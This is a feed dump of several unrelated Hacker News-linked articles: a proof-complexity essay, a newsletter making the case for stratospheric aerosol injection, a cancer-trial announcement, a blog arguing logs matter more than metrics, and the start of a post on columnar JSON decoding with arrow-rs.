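As a tiny illustration (again a Lean 4 sketch): a constructive existence proof carries its witness inside the proof term, so a program can extract it.

-- The proof term below literally contains the witness n + 1: from this
-- proof we can compute the number whose existence the theorem asserts.
theorem exists_gt (n : Nat) : ∃ m, n < m := ⟨n + 1, Nat.lt_succ_self n⟩

A classical proof of the same statement—say, by deriving a contradiction from "no such m exists"—would certify the theorem without handing us any particular m.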

    For example, the Four Color Theorem was initially proven using a brute-force computer-assisted proof, verifying many cases without providing a human-comprehensible reason for why it holds. In contrast, many number-theoretic theorems have constructive proofs that immediately yield algorithms.

This distinction ties directly into complexity theory: If a problem is in $\mathcal{N}\mathcal{P}$, then we can verify solutions quickly—but can we find them efficiently? The existence of a solution does not imply that it can be computed in polynomial time.

    The Computational Future of Proofs

    Modern developments in automated theorem proving and interactive proof assistants are pushing mathematics toward a more computational paradigm. Proof assistants like Lean, Coq, and Isabelle formalize mathematical arguments as computational objects. And increasingly, mathematicians are using them.

    Why should this matter? Because if proof search is a computational problem, then questions about proof efficiency become questions about algorithm design.

    Mathematical proof isn’t just about verification—it’s about complexity. The length, structure, and computational cost of proofs aren’t just theoretical curiosities; they reflect fundamental limits of reasoning itself. And in an era where AI-assisted theorem proving is becoming practical, understanding proof complexity isn’t just a curiosity—it’s a necessity.

    Conclusion

    So, why do we seek multiple proofs of the same theorem? Not just for elegance. Not just for insight. But because proof complexity is real.

    Mathematicians should care about proof complexity because:

    1. Proofs encode computation, and different proofs reveal different computational efficiencies.
    2. Gödel’s insight suggests that understanding proof complexity could help measure mathematical reasoning itself.
    3. If $ \mathcal{P} \neq \mathcal{N}\mathcal{P} $, then some theorems have short proofs we can’t efficiently find—implying fundamental limits on mathematical knowledge.

    So next time you see a new proof of a theorem, think of it not just as another way to see the truth—but as a different computational path, a different algorithm, and maybe, just maybe, a step toward an optimal proof.

    And if someone ever does prove $ \mathcal{P} = \mathcal{N}\mathcal{P} $, well… we might just be able to automate all of mathematics.

    ]]>
    https://seniormars.com/posts/multiple-proofs/ hacker-news-small-sites-43199463 Thu, 27 Feb 2025 22:52:26 GMT
    <![CDATA[No one is coming to save us. Time to cowboy up]]> thread link) | @andyjsong
    February 27, 2025 | https://www.keepcool.co/p/no-one-is-coming-to-save-us-time-to-cowboy-up | archive.org

    Hi there,

Today's Keep Cool edition was written by Andrew Song, the co-founder of Make Sunsets. Increasingly, I'll turn these pages over to others to collaborate with me or publish their own 'op-eds' (which I think is a worn-out term; "op-eds" can be highly analytical and rigorous). I only offered light edits and some resources + data additions.

Five more editor's notes (feel free to skip straight to the Deep Dive as desired):

    • There are dead players and live players (credit to Samo Burja for conceiving of this heuristic) in any field. That’s especially relevant right now, as we’re in the midst of radical change across industries, social norms, planetary climate systems, geopolitics, and whatever else may come to mind for you.

    • Per the coiner of the concept, Samo: “A live player is a person or well-coordinated group of people that is able to do things they have not done before. A dead player is a person or group of people that is working off a script, incapable of doing new things.” In my words? Dead players are stuck in old paradigms. They’re incapable (at least, absent evolution) of adapting to new paradigms, of shifting entrenched, engrained behaviors and how they see and operate in the world. Side note on a past political example offered at the end of this newsletter.**

    • Live players, meanwhile, are, at the minimum, willing to test and tinker, often well outside the norms of past paradigms, in service of finding new models, practices, ideas, and strategies that can actually shake things up (ideally positively vs., say, in service of accelerating extraction and the consolidation of power and wealth).

    • Re: this newsletter takeover, I (Nick) am not some Make Sunsets groupie. If nothing else, I think a) geoengineering is firmly in the “climate” zeitgeist now and isn’t going anywhere (I’ll give myself some credit here, having discussed it since 2023), and b) Make Sunsets is a “live player.” The field of ‘climate’ work is—from my vantage point—littered with dead players (including myself to an extent!). I’m talking about organizations, companies, corporate and national ‘commitments,’ communication frameworks, and lifelong institutionalists and rule followers who try and have tried mighty hard but haven’t bent the overarching curve of warming, global emissions, or global decarbonization for 30+ years now (see chart below for visual evidence to that point). Sorry to say it! & I’m guilty, too.

• Hence, we should pay attention to the live players, especially as live players in other fields (*cough cough,* the new U.S. Federal admin) go "shock and awe" mode while the dead players (geriatric politicians, crumbling legacy media, etc…) throw up their hands and say, "This is unprecedented! You can't do that!" As bad as some, if not most, of what's happening politically in the U.S. is, in my opinion, it illustrates the power of what live players can accomplish in short order. So… the invitation is to all work on becoming 'live players' in service of good ends.

    Decarbonizing, as measured by CO2 vs. PPP, has not accelerated meaningfully since 1990 (at least) — and that’s despite $2 trillion in decarbonization spending globally in 2024

    Final note: Make Sunsets is paying me nothing to publish this. I’m not here to push their approach or their project. I’m here to push the conversation. Lots of folks don't like their approach. That's cool, welcome in fact! That's what we need more of, at minimum in addition to the ‘kumbaya’ renewables-only boosting, doom & gloom, policy-focused, and utility, insurance, and oil & gas company-blaming comms approach. / end rant

    The newsletter in 50 words: We geoengineer every day and have for millennia. Ever since humans harnessed fire and animal husbandry (especially for methane-belching cows, goats, and sheep), that's been true. The challenge? 99.99% of our current geoengineering destabilizes Earth's climate systems. What might it look like to get strategic about doing geoengineering in 'reverse?'

    Nick

    DEEP DIVE — TIME TO ENGINEER A MORE STABLE CLIMATE

    The world has sustained 1.5°C of warming above pre-industrial levels for over a year now. There’s no sign that trend will change anytime soon. Put plainly: We’ve run out of time to ‘do’ decarbonization without additional help to cool the planet now and buy time.

    Despite a cold winter in North America, January 2025 set another startling heat record globally.

    The Paris Agreement—with its lofty goals of keeping warming “well below 2°C”—is starting to look more like a polite diplomatic exercise than a genuine rescue plan. Despite pledges and targets, the energy transition simply isn’t happening fast enough. 82% of global primary energy is still fueled by oil, gas, or coal, and that number has only fallen marginally in recent decades.

Yes, I know primary energy is an imperfect measure of the energy transition. But it does offer a perspective on how slowly, globally, the transition is moving (Nick note)

    Why CO₂ removal alone won’t save us

    Many have pinned their hopes on dramatic emissions reductions across sectors (mind you, emissions of most if not all major greenhouse gasses globally remain at all-time highs) coupled with carbon dioxide removal (CDR): Capturing CO₂ from the air. The hard truth is that that approach is too expensive and too slow to cool the planet in time.

    • $330/ton: The average retail price for removing 1 ton of CO₂ through today’s carbon removal projects. Note that many of these companies are likely charging less for removal than their hard costs!

    • $3.58 billion: Spent so far on CO₂ removal, according to CDR.fyi.

    • 13.2 million tons of CO₂ have been sold, but only 4.5% of that has actually been delivered. Even if all of it were delivered, it would offset less than Nepal's annual CO2 emissions (not a big or emissions-intensive country, mind you, and again, that’d just be for one year!).

• Meanwhile, we pumped out over 37 billion tons of CO₂ in 2023 and have accumulated a debt of over 1 trillion tons of CO₂ since the industrial revolution—orders of magnitude more than we've sucked up.

    For most companies, trying to offset all of their emissions at $330/ton would be a fast track to bankruptcy. Even the target price of $100/ton of CO2 removed would cripple most major companies. As a result, the advanced market commitment that was supposed to turbocharge the voluntary carbon market hasn’t come close to bridging this gargantuan gap, at least not yet. We wish them luck!

Bottom line: Today's CO₂ removal industry will not meaningfully change global temperatures before 2100, and we shouldn't put all our eggs into one basket. Could carbon removal scale? Sure. But public (and frankly, also private) sector commitment and will to accelerate that effort is nowhere near where it was even two to three years ago. Should people working conscientiously on scaling carbon removal stop? Hardly. But we'll benefit from more tools in our toolbox, especially ones that would slow warming much more quickly than carbon removal can.

     † Aggregate price index of 1 ton of CO₂ removal sold on CDR.fyi as of December 2024

    We already geoengineer—we just do it poorly

    Humanity has been unintentionally geoengineering Earth for centuries. Greenhouse gases (GHGs) warm our planet, while sulfur aerosols cool it. Emissions from coal, shipping, and heavy industry have spewed sulfur dioxide (SO₂) into the lower atmosphere (troposphere), creating reflective particles that mitigate some CO₂-driven warming—albeit with severe side effects, including acid rain and others that are harmful to human and planetary health.

SO₂ emissions already peaked in 1979:

    134.6 million tons of SO₂ were emitted into the air in 1979

    By 2022, we’ve cut SO₂ emissions by 48.5%:

We're now down to 69.31 million tons of SO₂, something almost no one talks about.

    The unraveling of our “messy sunscreen”

    As governments cracked down on acid rain in the 1980s and 1990s via policies like the Clean Air Act, SO₂ emissions dropped. More recently, the International Maritime Organization forced ships to reduce emissions of SO₂ by scrubbing out the proverbial “sunscreen” from shipping emissions (IMO2020). While that’s welcome news for forests and your lungs, to which SO2 can be harmful, it also inadvertently reduced the reflection of solar energy significantly, yielding even more net global warming.

    See more of this type of analysis from Zeke Hausfather here

    As pollution controls kicked in, we ironically reduced this unintentional “cooling shield.” According to climate scientist Zeke Hausfather, if it weren’t for aerosols originating from human activity, we could be close to 2°C of warming already. Slashing SO2 emissions to protect ecosystems and human health has allowed more CO₂ warming to “shine” through.

    For centuries, we have used SO2 to cool the planet, but we have done so haphazardly and inefficiently. Stratospheric aerosol injection (SAI) proposes doing it cleanly and strategically, focusing especially on getting the SO2 into the stratosphere for longer-lasting, more controlled results.

    The Pinatubo clue: Location & quantity are key levers

    In 1991, Mount Pinatubo in the Philippines erupted, injecting ~20 million tons of SO₂ into the stratosphere, ~20 km (~12.5 miles) above the Earth’s surface. The result? A 0.5°C drop in global temperatures for roughly a year.

    Economist (2023). “Solar geoengineering is becoming a respectable idea”

    This reveals a critical truth: Location—specifically, height and quantity of SO₂ injections—matter enormously. A fraction of sulfur in the stratosphere can achieve the same cooling as far larger amounts of SO2 closer to ground level.

    1:1,000,000 leverage

    With carbon removal, you remove 1 ton of CO₂ to counteract 1 ton of CO₂ emitted—a 1:1 ratio. It’s necessary in the long run, but it’s expensive and slow-moving.

    No, it’s not “permanent” in the way that avoiding the emission of carbon dioxide—which lingers in the atmosphere for hundreds of years—or carbon removal with long-term sequestration is. But carbon removal has its own durability and permanence issues; SAI is higher leverage and cheap, thus lending itself to iterative application, as needed, offering humanity more time to decarbonize (which will take many more decades).
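Taking the piece's own figures at face value, the leverage arithmetic runs as follows: offsetting one year of global emissions (~37 billion tons of CO₂) would require 37 billion ÷ 1,000,000 ≈ 37,000 tons of SO₂ per year, and at bulk sulfur prices of $100–$200 per ton that is roughly $3.7–7.4 million per year in raw material (deployment being a separate cost).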

    How we started + where we’re going

    Make Sunsets was born from the realization that we’re already geoengineering—just badly. We figured, let’s do it more carefully, ethically, and under public scrutiny.

    Here’s our journey so far:

    • First Micro-Launches: We began by releasing just 1 gram of SO₂ in Nevada, testing balloon delivery, and measuring data.

• Current Deployments: We deploy around 1,500 grams of SO₂ at a time. This is still barely a blip compared to continuing global SO₂ emissions. Still, it's enough to demonstrate feasibility while complying with US regulations and raising awareness by engaging with various media outlets. Want to see how it works? Watch here.

    • Scaling Plans: With demand, we can scale up to 1,000 kg (1 ton) of SO₂ per balloon. That single launch could offset the warming effect of 1 million tons of CO₂ for a year. Extend the logic further, and 37,000 of these balloons could pause warming for 1 year. Scale would also help us reduce costs as we can buy sulfur at cheaper market prices ($100 to $200 per ton) if we buy in bulk.

• Radical Transparency: From cost breakdowns to financial health, we share everything monthly on our blog and FAQ. We're not hiring PR firms that forget to tell a city's mayor that they're spraying chemicals off a death machine, and we're not running secret launches using "proprietary particles."

    We’ve built a passionate community: 840+ customers—including atmospheric scientists, climate researchers, engineers, teachers, doctors, lawyers, accountants, a co-owner of an NFL team, billionaires, VCs, students, founders, and "climate dads"—have purchased Cooling Credits, offsetting the warming of 123,808 tons of CO₂ for a year.

    Sure, that’s a drop in the ocean compared to total emissions. But it’s a real, measurable start—something no government, university research group, or corporation has done in SAI at this scale. And, let’s be real—while many CDR companies have raised hundreds of millions, we’re just two guys with under $2M in VC funding—yet in 2024, we delivered more cooling than any CDR company in the world.

    The Economic Case: Yes, SAI is like sunscreen—it requires reapplication.

    But, comparing costs:

    • SAI: $1 per ton-year—renewed annually until CO₂ exits the atmosphere.

    • CDR: $330+ per ton upfront—to remove a single ton permanently.

    Cost & permanence: SAI vs. carbon removal methods

    Despite the hype around carbon removal, permanent CO₂ capture remains expensive and slow-moving. Below is a short comparison of common CDR pathways alongside SAI:

[Table: cost and permanence of common CDR pathways alongside SAI. Costs vary widely by project scale, location, and technology maturity.]

    How can SAI be so cheap?

    1. Fast & Scalable: We don’t need massive plants that consume vast amounts of energy or complex pipelines. We just need balloons (and eventually planes), people (come volunteer if you like!), and capital to deploy aerosols.

    2. Bulk Sulfur Prices: Once you’re purchasing sulfur in tonnage at market rates ($100–$200/metric ton), the per-ton-year offset cost can drop well below $1. One ton of SO2 in the stratosphere can offset the warming of 1 million tons of CO2 for a year.

    3. Small Injection, Big Effect: Releasing a tiny amount of sulfur in the stratosphere yields significantly more cooling benefit than larger amounts deployed near ground level.

    SAI’s “catch”: Again, it’s like sunscreen. You have to keep doing it. If you stop injecting aerosols, the cooling effect fades over a couple of years, unlike permanent CO₂ removal options that lock carbon away for decades to millennia. Plus, there are many other potential externalities to evaluate → read on for more on that two sections down.

    Measuring our progress: Present to future

    Near-Term:

    • Weather Balloons: This is our current method to deliver SO₂ to stratospheric altitudes cost-effectively. Again, you can see it work in action here:

    Long-Term:

    • Aircraft Deployments: Once we’ve maxed out on balloons, we can use larger planes that can reach the stratosphere to inject bigger loads of SO₂ more efficiently and in precise locations.

    • Satellite Validation: As we scale, agencies like NOAA can measure aerosol distribution from space, using the same satellites that measure the cooling effect of stratovolcanic eruptions.

    • Refined Models: With real-world data, we’ll help hone climate models, track just how big or small SAI’s effect can be under different conditions, and get off the modeling treadmill with better and better data.

    It’s all tradeoffs, all the way down

    Injecting sulfate aerosol into the stratosphere will cool the planet, reducing mortality from heat, one of the leading risks of climate change. Sulfate aerosol air pollution is a leading cause of environmental mortality worldwide, so it is one of the most obvious risks of sulfate aerosol geoengineering. Sulfate aerosols in the stratosphere can also damage the ozone layer, causing an increase in mortality from skin cancers.

    David Keith and Anthony Harding

    All “climate” solutions come with tradeoffs all the way down. Here’s more on SAI’s “harm-to-benefit” ratio from the above authors, with links to more sources.

    So, what do we do now?

1. Acknowledge We're Already Geoengineering: The history of societal progress has been and is predicated on burning things, whether wood, dung, or fossil fuels. That releases CO2: Every day, we geoengineer. How we geoengineer today just happens to predominantly destabilize Earth's climate system rather than stabilizing it or leaving it untouched. There's no going back to "pristine" quickly. But we can put on sunscreen. Or at least figure out how to make the sunscreen work at scale in case we need it at a later date. Plus, we may well discover other ancillary applications from the R&D along the way.

    2. Take SAI Seriously. In addition to reducing emissions, SAI is perhaps the only proven approach that could scale quickly and drive immediate cooling.

    3. Keep Investing in CO₂ Removal & Global Decarbonization, and other R&D: SAI might provide relief now. But, again, none of this is to say we won’t also need to remove the CO₂ from the atmosphere, develop atmospheric methane removal, and, most importantly, do the deep emissions reductions work globally (absent which, little else matters). It’s always and, and, and, ad infinitum.

    From surpassing 1.5°C to the slow grind of global decarbonization or scaling up carbon removal, the current “climate” paradigm isn’t enough. Stratospheric aerosol injection offers a 1:1,000,000 leverage option, as one gram of SO₂ successfully deployed in the stratosphere offsets the warming of 1 ton of CO₂ for one year (at least). That’s not a get-out-of-jail-free card; it’s a bridge to buy time.

    To recap, here’s why it’s worth placing SAI in the ‘climate’ mitigation toolbox:

    • Near-Term “Bridge”: SAI can rapidly reduce warming now, buying time for global emission reduction efforts across industries and carbon removal (and other geoengineering) breakthroughs to catch up.

    • Not a Substitute for Decarbonization: Because SAI doesn’t remove carbon, we still need to reduce emissions and invest in more durable CO₂ removal (and evaluate other early-stage GHG removal or ‘destruction’ methods).

    • Inexpensive & Immediate: For any entity priced out by $300–$600/ton removal, SAI, at under $1/ ton-year, offers a compelling way to prevent additional near-term warming without waiting on game-changing tech or bankrupting budgets.

    At the bare minimum, we should keep advancing this as a wrench in our holistic climate system restabilization toolkit. That’s why we make the noise. Even if we make enemies, moving the geoengineering conversation along alone is worth it. As Nick wrote recently:

    In many fields of endeavor, if you aren't making enemies, you're not pushing on sufficiently salient questions. You’re not on the “knife’s edge.”

    Nick

As we proceed, we'll continue to try to prove that we can genuinely impact the global thermostat in a measurable, relatively safe fashion. Join us for the next balloon launch and check out lots more content on our website (or Nick's past writing: see here and here, for instance). Plus, we can always share many more resources for further learning.

    Feedback? Pushback (desired!)? Comments? Respond and I’ll share with Andrew & co.

    — Nick

    More references & data sources

** Addendum on dead vs. live players from Nick's intro: Dead, or at least only "half live" players, are kinda like Obama, who, after campaigning on his ability to be the real deal live player-wise and winning majorities in both the House and Senate, surrounded himself with dead players—i.e., institutionalists, like Larry Summers. Thus, his admin achieved far less than it could have in the way of real reform, especially in banking. I say this as a quite liberal person overall, and a fan of Obama's in general.

    ]]>
    https://www.keepcool.co/p/no-one-is-coming-to-save-us-time-to-cowboy-up hacker-news-small-sites-43199437 Thu, 27 Feb 2025 22:49:11 GMT
    <![CDATA[World-first experimental cancer treatment paves way for clinical trial]]> thread link) | @femto
    February 27, 2025 | https://www.wehi.edu.au/news/world-first-experimental-cancer-treatment-paves-way-for-clinical-trial/ | archive.org

    An Australian-led international clinical trial will scientifically investigate the efficacy of the approach within a large cohort of eligible glioblastoma patients and could commence within a year.

    The study will trial the use of double immunotherapy. In some patients, double immunotherapy will be combined with chemotherapy.

    The trial will be led by The Brain Cancer Centre, which has world-leading expertise in glioblastoma.

    “I am delighted to be handing the baton to Dr Jim Whittle, a leading Australian neuro-oncologist at Peter MacCallum Cancer Centre, The Royal Melbourne Hospital and Co-Head of Research Strategy at The Brain Cancer Centre, to commence a broader scientific study to scientifically determine if – and how – this process might work in treating glioblastoma,” said Prof Long, who also secured drug access for the clinical trial.

    “While we are buoyed by the results of this experimental treatment so far, a clinical trial in a large group of patients would need to happen before anyone could consider it a possible breakthrough.”

    Dr Whittle, also a laboratory head at WEHI, said: “We are pleased to be able to build on this exciting work by diving into the process of designing a clinical trial, which takes time, care and accuracy.

    “When that process is complete, the result will be a world first clinical trial that enables us to thoroughly test the hypothesis against a representative sample of patients.”

    The Brain Cancer Centre was founded by Carrie’s Beanies 4 Brain Cancer and established in partnership with WEHI with support from the Victorian Government.

    The centre brings together a growing network of world-leading oncologists, immunologists, neurosurgeons, bioinformaticians and cancer biologists.

    Commencement of recruitment for the clinical trial will be announced by The Brain Cancer Centre at a later date and will be limited to eligible patients.

    ]]>
    https://www.wehi.edu.au/news/world-first-experimental-cancer-treatment-paves-way-for-clinical-trial/ hacker-news-small-sites-43199210 Thu, 27 Feb 2025 22:24:22 GMT
    <![CDATA[Show HN: SDL-Ball Ported for the Web]]> thread link) | @dusted
    February 27, 2025 | https://midzer.de/wasm/sdl-ball/ | archive.org

    Unable to extract article]]>
    https://midzer.de/wasm/sdl-ball/ hacker-news-small-sites-43199148 Thu, 27 Feb 2025 22:17:16 GMT
    <![CDATA[Logs Matter More Than Metrics]]> thread link) | @mathewpregasen
    February 27, 2025 | https://www.hyperdx.io/blog/logs-matter-more-than-metrics | archive.org

    Disclosure: I run an observability company, so this post is subject to some (heavy) bias. However, it also underscores why I wanted to work on HyperDX.

    Metrics matter. Logs matter more.

But that's not how most developers see it. Developers love metrics. It's something they put care and attention into. Developers call meetings to figure out how to implement and interpret metrics. They are readily shown to new hires—colorful dashboards with sprawling statistics measuring CPU, memory, and network health. Once, when demoing my product, I was told by an engineering director, "This is cool, but where are the fancy charts?"

Logs get none of that hype. They are the ugly stepchild of observability. They get implemented, but with the attitude reserved for a necessary evil. They don't get meetings dedicated to them. They're never flaunted to new hires. They just exist, quietly recording events in the background.

    Here’s the irony: while metrics might have the aesthetic of a complex system, logs are more useful 80% of the time. When an incorrect behavior emerges, logs are more likely to explain what happened than any metrics. Logs—particularly logs with high cardinality—provide a detailed recollection. They feature no dimension reduction. And metrics, by definition, do. They are just a crude read of a bug’s effect on an application.

    Not All Logs Are Created Equal

    The importance of logs is partially diminished because they are poorly implemented in many organizations. The difference between a good log and a great log is striking.

    Great logs are those with attributes that can tie an event to the source of the issue (e.g. a user_id, payment, host, etc.). This is often framed as logs with high cardinality. High cardinality means that the log includes multiple fields containing unique values. For example, a front-end logged event might include a session ID, a request ID, a user ID, an organization ID, a payment ID, a timestamp, and a network trace. High cardinality like this is a heuristic for a log actually being useful in the case of an error.
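As a sketch of what this looks like in practice—here using Rust's tracing crate with tracing-subscriber's json feature; the field names and values are purely illustrative:

use tracing::info;

fn main() {
    // Emit logs as structured JSON so every field stays queryable later.
    tracing_subscriber::fmt().json().init();

    // Stand-ins for real request context; in production these would come
    // from the live session, request, and payment being processed.
    let (session_id, request_id, user_id, payment_id) =
        ("sess_9f2c", "req_71ab", "user_4217", "pay_88d3");

    // Every field below is a high-cardinality attribute: a unique-ish value
    // that ties this one event back to a specific user, request, and payment.
    info!(
        session_id,
        request_id,
        user_id,
        payment_id,
        amount_cents = 4980_u32,
        "payment captured"
    );
}

Compare that to a bare info!("payment captured") with no fields: both record the event, but only the first can answer "which user, which request, which payment?" when something breaks.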

    Tricky Bugs Where Logs Are the Saving Grace

    I have two contrasting examples that illustrate the value of logs.

    The Socket Timeout

A while ago, we had a weird issue with sockets—customers reported certain queries would unpredictably time out. On our dashboard, there were no reports of failed ClickHouse queries—however, customers failed to get data that originated in ClickHouse. Looking through our traces associated with those specific customers and timestamps, we discovered the error: The ClickHouse query succeeded, but the load balancer's socket timed out before ClickHouse could reply. This became obvious when comparing the timestamps of the socket and the ClickHouse response, and observing the corresponding error returned within our API.

Using the logs, we were able to correlate the types of requests that would lead to the same behavior. Additionally, on the ClickHouse side, we could determine what query properties caused sluggish performance. None of these details could have been traced from a spurious failure metric.

    Glofox Fake “DDoS”

Pierre Vincent has a fantastic developer talk at InfoQ's Dev Summit where he discusses logs versus metrics. Pierre works at Glofox, a gym management software company. A few years ago, they experienced an incident that highlighted how metrics could be misleading in the absence of great logs.

    Because Glofox creates gym software, the pandemic significantly impacted their product’s usage. Gyms suddenly closed (and subsequently opened) on government orders. On one of these reopening dates, Glofox experienced a massive surge in requests, which lit up metrics.

    Through metrics, Glofox appeared to be suffering from a DDoS attack originating in Singapore. The easy remedy would be blocking all the IPs dispatching thousands of requests. Singapore was also reopening gyms that day, and Pierre suspected the incident wasn’t actually an attack. But it also wasn’t just returning users; the requests were overwhelming.

    By diving through logs, Glofox’s engineering team nailed the culprit: Glofox’s front-end had a bug where lengthy sessions would dispatch more and more requests due to an unintentional JS loop. Many of Glofox’s Singaporean customers had been shut down for months but had minimized tabs. By reopening these tabs, Glofox’s back end was inundated by months of quarantined requests, which imitated a DDoS attack.

    Only because of logs was Glofox able to diagnose the problem and devise a quick remedy that enabled their application to persist on one of the most important days of the year.

    Developer Religions

    I’ll admit this debate hinges on some concept of developer religions—the idea that developers, myself included, have strong beliefs because of some hypothetical ideal. Some developers swear by the importance of metrics; I care more about capturing high cardinality data through logs.

    But to be clear, it is ridiculous to believe one should exist at the demise of the other. It’s more a matter of foundations. In my worldview, high cardinality should be the north star for building a good observability stack; metrics should follow.

Funnily enough, I hold the opposite belief regarding our marketing strategy. For marketing, I care more about metrics than individual stories. That's because marketing is an outcome-optimization problem—strategies succeed or fail on the basis of an aggregate. That mindset doesn't hold when it comes to development, where the goal is to eliminate issues that any user is facing.

    A Closing Thought

Logs matter. They matter in the same vein that testing matters, CI/CD matters, security matters. Without good logs, errors turn from nuisances to headaches. So next time your team brings up the importance of metrics, push aside the hype of fancy charts and spend time improving your logs. Of course, you can take my opinion with a grain of salt—I run an observability company that's built on good logs—but there's a reason I ended up in this space.

    ]]>
    https://www.hyperdx.io/blog/logs-matter-more-than-metrics hacker-news-small-sites-43199096 Thu, 27 Feb 2025 22:11:47 GMT
    <![CDATA[Fast columnar JSON decoding with arrow-rs]]> thread link) | @hkmaxpro
    February 27, 2025 | https://www.arroyo.dev/blog/fast-arrow-json-decoding | archive.org

    My day job is working on the Arroyo stream processing engine, which executes complex, stateful queries over high-scale streams of events. Computing things like windowed aggregates, stream joins, and incrementally-computed SQL involves, as you might imagine, a lot of sophisticated algorithms and systems. Doing it much faster than existing systems like Apache Flink took careful performance engineering at every level of the stack.

But…I'm going to let you in on a little secret. The sad truth of this industry, which no one will tell you, is that so, so many data pipelines spend the bulk of their CPU time…deserializing JSON [1].

That's right. Everybody's favorite human-readable and sorta-human-writable data interchange format has been responsible for >50% of CPU usage on several high-scale Flink pipelines I've worked on. And so if you want to build a fast stream processing engine, you need to start with a fast JSON deserialization strategy [2].

Arroyo's internal data representation is built on top of Arrow, a columnar in-memory format designed for fast analytical processing [3]. So our challenge is to take row-oriented JSON, parse it, and build out columns from the corresponding field in each document. And do this as fast as possible.

    Fortunately, we don't have to start from scratch: the arrow-rs project includes a very fast JSON decoder, largely written by Raphael Taylor-Davies. I found the approach quite interesting and thought it was worth writing up. So we'll dig into how arrow-json works and then talk through Arroyo's extensions to support raw JSON—leaving parts of the JSON serialized—and the ability to skip records in a batch that don't match the schema. Along the way you should pick up some intuition for how to work with columnar data, which many engineers find challenging and unfamiliar in our typically row-oriented world.


    But is this fast?

    Before we get into the details, we might want to answer the question…is this actually fast? And the answer is: yes! Benchmarking against the Jackson-based deserializer used for Flink SQL, arrow-json is up to 2.3x faster:

Benchmark | Java (µs/record) | Rust (µs/record) | Speedup
Nexmark | 0.578 | 0.586 | -0.14%
Bids | 0.517 | 0.396 | 30.6%
Logs | 0.609 | 0.504 | 20.8%
Tweets | 11.730 | 5.108 | 229%

    (See https://github.com/ArroyoSystems/json-benchmarks for the benchmark source code and test documents.)

    Arrow-json does particularly well with large, deeply nested records, and poorly with enum-like structures where there are many null fields.

    Batched decoding

    Arrow, like other columnar formats, operates in batches. We're almost never dealing with just one record (or “row”) of data, because columnar formats achieve their high performance by storing many values together in a single array. If you just have one row, the columnar overhead eats any performance gains.

    So our goal is to take a bunch of JSON documents (generally with a top-level object) and turn them into a set of arrays representing each column of the schema.

    To make this concrete, let's take data representing HTTP server logs:

Field Name | Data Type
ip | Utf8
identity | Utf8
user_id | Utf8
timestamp | Timestamp
date | Utf8
request | Utf8
code | UInt32
size | UInt64

    An example document looks like this:

    {
      "ip": "131.62.139.111",
      "identity": "-",
      "user_id": "jimmy_voluptas",
      "timestamp": "2025-02-19T09:15:21.884163-08:00",
      "request": "POST /tmp/high/own.zip",
      "status_code": 404,
      "size": 4980,
      "referer": "-",
      "user_agent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
    }

    And we'll be decoding each column into arrays like this:

ip | 137.100.60.165 | 3.249.253.103 | 118.64.108.216 | 113.243.167.149 | 133.131.152.130 | 121.87.92.182
identity | - | - | - | - | - | -
user_id | deven_qui | kiara_nihil | eladio_cupidita | lucile_tempora | rae_et | enrico_dolorum
timestamp | 2025-02-19T09:15:22.281400-08:00 | 2025-02-19T09:15:22.303590-08:00 | 2025-02-19T09:15:22.325585-08:00 | 2025-02-19T09:15:22.347106-08:00 | 2025-02-19T09:15:22.369079-08:00 | 2025-02-19T09:15:22.391311-08:00
request | GET /sbin.tar | GET /var/problem/first.zip | GET /part/public.ppt | GET /etc/harper/man/few.xls | GET /usr/aria/elijah/man.rar | GET /var/week/life.xls
status_code | 401 | 500 | 403 | 200 | 500 | 403
size | 9512 | 6965 | 9109 | 2886 | 4592 | 706
referer | - | - | - | - | - | -

    In general, operations are much more efficient if we can perform them along the grain of columns; in other words we want to decode all of the ips, then all of the identities, then all of the user_ids, as this allows us to avoid repeatedly downcasting (interpreting as a concrete type) our generically-typed arrays.

    Stealing from the best

To do so, arrow-json uses an idea from simdjson, one of the fastest JSON decoders out there [4]. While most JSON libraries parse (understanding the structure of the document) and deserialize (converting to a tree representation) as a single step, simdjson uses two passes. In the first pass, it identifies all of the structural tokens ([, {, ], }, :, ,) and stores their locations in a separate array [5]. In the second pass each previously-identified node is parsed into the tree. For simdjson this strategy enables SIMD (single-instruction multiple data) processing to quickly identify the token locations, then allows parallelizing tree construction because fields can be handled without needing to finish previous fields.

It turns out this structure is quite helpful for columnar parsing as well: we can use the output of the first pass to deserialize entire columns at once, since we know up front where all of the fields corresponding to a given column sit in the buffer.

    We do need to make some changes to the simdjson approach to support efficiently operating over many JSON documents. The arrow-json interface looks like this:

    impl Decoder {
        pub fn decode(&mut self, buf: &[u8]) -> Result<usize, ArrowError>;
     
        pub fn flush(&mut self) -> Result<Option<RecordBatch>, ArrowError>;
    }

decode is a method on the Decoder struct (which stores the state of the in-progress batch); it takes a byte slice—an immutable view of a sequence of bytes—and returns either the number of bytes processed or an error if the JSON was malformed.

    The API supports streaming. We can just keep piping in bytes representing potentially partial JSON documents without having to frame them (figure out where one ends and the next begins). When we're ready to consume the outputs, we call flush which returns an Arrow RecordBatch (a series of columns with a schema) with all of the data we'd sent to decode.

    As we're just given slices (which are references to data we don't own) and we're deferring the actual deserialization to the flush call, we need to store the underlying data ourselves in order to reference it in the second pass.
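A quick sketch of that flow, using arrow-json's ReaderBuilder (the schema and the chunk boundary are invented for illustration):

use std::sync::Arc;
use arrow_json::ReaderBuilder;
use arrow_schema::{DataType, Field, Schema};

fn main() -> Result<(), Box<dyn std::error::Error>> {
    let schema = Arc::new(Schema::new(vec![
        Field::new("ip", DataType::Utf8, true),
        Field::new("size", DataType::UInt64, true),
    ]));
    let mut decoder = ReaderBuilder::new(schema).build_decoder()?;

    // Two documents arriving split across an arbitrary chunk boundary —
    // no framing needed; the decoder carries its parse state between calls.
    let chunks: [&[u8]; 2] = [
        br#"{"ip":"1.2.3.4","size":42}{"ip":""#,
        br#"5.6.7.8","size":7}"#,
    ];
    for chunk in chunks {
        let mut buf = chunk;
        while !buf.is_empty() {
            let read = decoder.decode(buf)?;
            buf = &buf[read..];
        }
    }
    // flush() builds the columnar RecordBatch from everything buffered.
    let batch = decoder.flush()?.expect("rows were buffered");
    assert_eq!(batch.num_rows(), 2);
    Ok(())
}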

    Run the tape

With that background, we can describe the arrow-json deserialization algorithm. We'll start with the first pass, where we parse the JSON into a flattened "tape" data structure containing an array of structural components. While we process bytes, we build up three data structures:

• tape: Vec<TapeElement>, a list of structural elements in the data, like {, }, [, as well as strings, numbers, literals, etc. Structural elements store an int identifying their opposite element (so a { points to the index of the corresponding }), while strings and numbers are stored as indices into the offsets array
